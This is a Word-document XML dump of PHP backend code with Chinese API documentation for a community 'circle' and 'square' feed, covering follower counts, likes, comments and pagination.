    <w:p w14:paraId="6D385E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2695D5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des', 'desc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1D9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540A4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2A0999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6255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s) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506BE3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s as $key =&gt; $circle) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F3C7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circle_ids[] = $circle['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0437FF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key]['img'] = $circle['img'] ? _imgUrl() . $circle['img'] : '/public/style/index/member/img/default_circle_logo_52x52.png';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73504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key]['des'] = is_null($circle['des']) ? 0 : $circle['des'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA2F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key]['hide'] = is_null($circle['hide']) ? 0 : $circle['hide'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EFB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num = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702427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3618E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4F56F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key]['article_num'] = $article_num;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BF9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r_num = Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4D88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circle['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6C7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47565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5B695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key]['follower_num'] = $follower_num;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5897CA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num != $circle['article_num'] || $follower_num != $circle['follower_num']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52354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ircle')-&gt;where('id', $circle['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614B72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26799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num' =&gt; $article_num,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229BF9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r_num' =&gt; $follower_num,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BFF1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9CD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AEE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4CF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5AEC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D93B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371EA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2DAF8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D9DE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0147BC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3821AE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7F2C8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6880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1B2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circle_ids) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5204C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Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3B3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in', $followed_circle_ids)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2760A3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416B0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41B696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14AC9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articles['data']) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B90E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rticles['data'] as $key =&gt; $article) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416086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s'] != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F111C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article['images']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7950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oreach ($images as $image) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F172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s'][] = _imgUrl() . $image;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A2B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EA2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3CB3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CA5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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F41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follow_num'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562EB4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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D8EF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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15664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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108A94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2F7CFF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member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694FAF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3114DD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article['member_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08942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36E05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author['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586EF6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author['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FDE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follow_num'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC19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760F6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88230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circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45864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article['member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9C66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A25A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article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21500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article['member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C0F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79513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16C7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 = Db::name('circle')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFA60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circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594789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8773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img'] = $circle['img'] ? _imgUrl() . $circle['img'] : '/public/style/index/member/img/default_circle_logo_52x52.png';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008156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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE78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A631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 Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26765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article['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26256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03A43B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4E814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190C0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ollow &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3939A5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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738DB8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DA7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Db::name('circle_article_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA6E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233F6C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53354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3DAEA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6F422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Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58588A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57B65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gt;where('uid', $this-&gt;memberId)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7AD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6D0E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9D0A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circle'] = $circle;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB57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 = Db::name('circle_article_ping')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DD7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52434C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7AE84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2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B025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2FD4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s) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2972A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s as $k =&gt; $ping) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8A7E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ping['member_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1B7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username'] = $member['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC36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img'] = $member['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDA4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E5AB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0429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pings'] = $pings;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA6F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8953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B4487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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F10CD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02B0C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52C7F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89A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7E7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D2117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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099C6B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50C19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2D7BFF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0E4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C8BE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4747B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263CC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CC3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0A2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1C27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gt; $circles,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAEA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gt; $articles,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7620A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9028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7285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8A5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square </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区广场（社区动态｜用户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7808C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用户社区广场（社区动态｜用户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0382F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530CE2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05770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已登录用户必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25717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is_hot        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是否为热门：</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非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCBEB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is_latest     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是否为最新：</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非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63168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type_id       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B49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age          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>页码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F1C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per_page      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F2C3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Json} result            </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态｜用户动态列表（分页展示</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> + 2</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>条评论）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694E8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03FF27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6EA059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码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18929F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data              </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据集合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF65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data.image_urls  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>多图</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>集合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E433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_num   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态获得点赞次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0186A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cai_num   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态获得点踩次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270C2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ping_num  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态评论数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186570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share_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态分享次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068CE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is_top    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态是否置顶：</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6776F8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is_selected </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态是否加精：</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5A16B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username      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者昵称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A6F6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author_img           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04493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uthor_follow_num   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者关注数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E9AD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author_article_num  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者发表文章数目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB31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zan       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户是否点赞该动态：</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2AF4B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follow    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户是否关注该动态作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09EF3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circle       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态所属社区信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A16F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title </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态所属社区名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2D3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img   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态所属社区头像</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA80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article_num   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态所属社区动态数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B69AC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follower_num  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态所属社区关注人数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300C9C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ircle.follow   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户是否该动态所属社区：</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6EDC8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pings                      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态的两条评论</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE94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s.*.author_username  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该评论作者昵称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19172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pings.*.author_img       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该评论作者头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2983EB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EA9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quare()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BF2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2B8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 = input('param.page', 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D01B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8);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0594F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hot = input('param.is_hot', 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDE8B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latest = input('param.is_latest', 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D95B6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param.type_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138316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circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FCA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466B9F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hot != 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DD74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hot = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDA93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latest = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F48C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554D16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whereOr('is_top', 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09737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Or('is_selected', 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED9C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ECB8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latest != 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38691C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hot = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33764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latest = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB84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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25367F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query-&gt;order('create_time', 'desc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BA4C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update_time', 'desc');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240358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5884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type_id != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D4FB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hot = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C0A5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s_latest = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038CB2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s = Db::name('circle')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AC3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id')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354D0C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type_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ED24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FAA2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circles) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB6B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s = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E6B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circles as $circle) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A83A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_ids[] = $circle['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0833A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BF3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ery = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F55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40217A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in', $circle_ids);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6A66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E75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087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 = $query-&gt;paginate($per_page, false, ['page' =&gt; $page,])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DB5F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61F72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articles['data']) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62ED4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rticles['data'] as $key =&gt; $article) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4311F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s'] != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22856D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explode(',', $article['images']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C806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ages as $image) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBD6F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image_urls'][] = _imgUrl() . $image;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5D53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5C2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837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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AD0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F920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follow_num'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00852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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102BB7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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7832A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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACA04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Db::name('member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432BC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member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0269BE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2DB01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article['member_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C7C8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265C8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username'] = $author['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461B4E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img'] = $author['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209E7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follow_num'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEA6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0DD51F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442974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circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05752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article['member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1AD9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3267A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author_article_num'] += Db::name('article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264910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article['member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0541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0BA7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A883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ircle = Db::name('circle')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CF0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circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5C1D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1F25F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img'] = $circle['img'] ? _imgUrl() . $circle['img'] : '/public/style/index/member/img/default_circle_logo_52x52.png';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A515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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0A7D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6835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 Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AD3A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article['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB192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36400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51BA5E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5C65C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ollow &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E634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ircle['follow'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7EA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3AA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zan'] = Db::name('circle_article_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7769E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35079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7F810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zan', 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1333A3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F0824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follow'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365A23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article['member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B18E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45346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07491A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8DD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circle'] = $circle;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9EF2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 = Db::name('circle_article_ping')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD4A1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article_id', $article['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3CB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create_time', 'desc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EF2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2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0F68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627E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pings) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440CDB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pings as $k =&gt; $ping) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4F28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ping['member_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D4A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username'] = $member['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4D9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s[$k]['author_img'] = $member['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF3D6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69F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9080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data'][$key]['pings'] = $pings;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A5B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F75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E14B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rticles);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2616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4A23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4439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ircle/follow_author </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>关注｜取消关注用户社区动态作者</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414FD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关注｜取消关注用户社区动态作者</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3018EE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478E4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872C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6848E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article_id    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区动态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465CD1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关注动态作者成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EE0E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Integer} follow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关注；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已取消关注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AB1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关注动态作者失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42125B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558C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EB1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_author()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F50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6E8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AEF1F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528699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0A96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DAAB5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关注用户社区动态作者</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
